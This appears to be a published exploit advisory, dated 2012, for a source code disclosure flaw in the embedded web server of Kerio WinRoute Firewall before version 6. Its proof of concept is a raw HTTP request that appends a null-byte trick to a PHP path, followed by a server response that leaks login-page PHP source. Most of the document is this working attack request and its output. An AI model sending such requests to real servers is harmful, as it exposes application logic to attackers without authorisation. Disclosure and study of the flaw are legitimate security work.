39 lines
No EOL
1.2 KiB
Text
39 lines
No EOL
1.2 KiB
Text
# Exploit Title: Kerio WinRoute Firewall Embedded Web ServerVersion: Source
|
|
Code Disclosure
|
|
# Google Dork:
|
|
# Date: 10.05.2012
|
|
# Author: Eugene Salov, Andrey Komarov (Group-IB, http://group-ib.ru)
|
|
# Software Link: http://winroute.ru/kerio_winroute_firewall.htm
|
|
# Version: prior to 6
|
|
# Tested on: Microsoft Windows
|
|
# CVE :
|
|
|
|
Source code disclosure attacks on Kerio Web Server allow a malicious user
|
|
to obtain the source code of a server-side application.
|
|
This vulnerability grants the attacker deeper knowledge of the Web
|
|
application logic.
|
|
|
|
POC:
|
|
GET /nonauth/login.phpNULL_BYTE.txt HTTP/1.1
|
|
User-Agent: Group-IB OAiK Fuzzer
|
|
Host: hostname
|
|
|
|
HTTP/1.1 200 OK
|
|
Connection: Close
|
|
Content-Length: 2410
|
|
Content-Type: text/plain
|
|
Date: Fri, 27 Apr 2012 13:42:27 GMT
|
|
Last-Modified: Wed, 15 Oct 2008 03:14:06 GMT
|
|
Server: Kerio WinRoute Firewall Embedded Web Server
|
|
|
|
<?php
|
|
require_once('configNonauth.inc');
|
|
require_once(CORE_PATH . 'langHeader.inc');
|
|
require_once(LIB_PATH . 'Page.inc');
|
|
require_once(LIB_PATH . 'HtmlElements.inc');
|
|
require_once(CORE_PATH . 'common.inc');
|
|
require_once(CORE_PATH . 'browser.inc');
|
|
$afg = '';
|
|
$jy = kerio("webiface::PhpNonAuth");
|
|
$jy->getAsocUserName(&$afg, &$aba);
|
|
..... |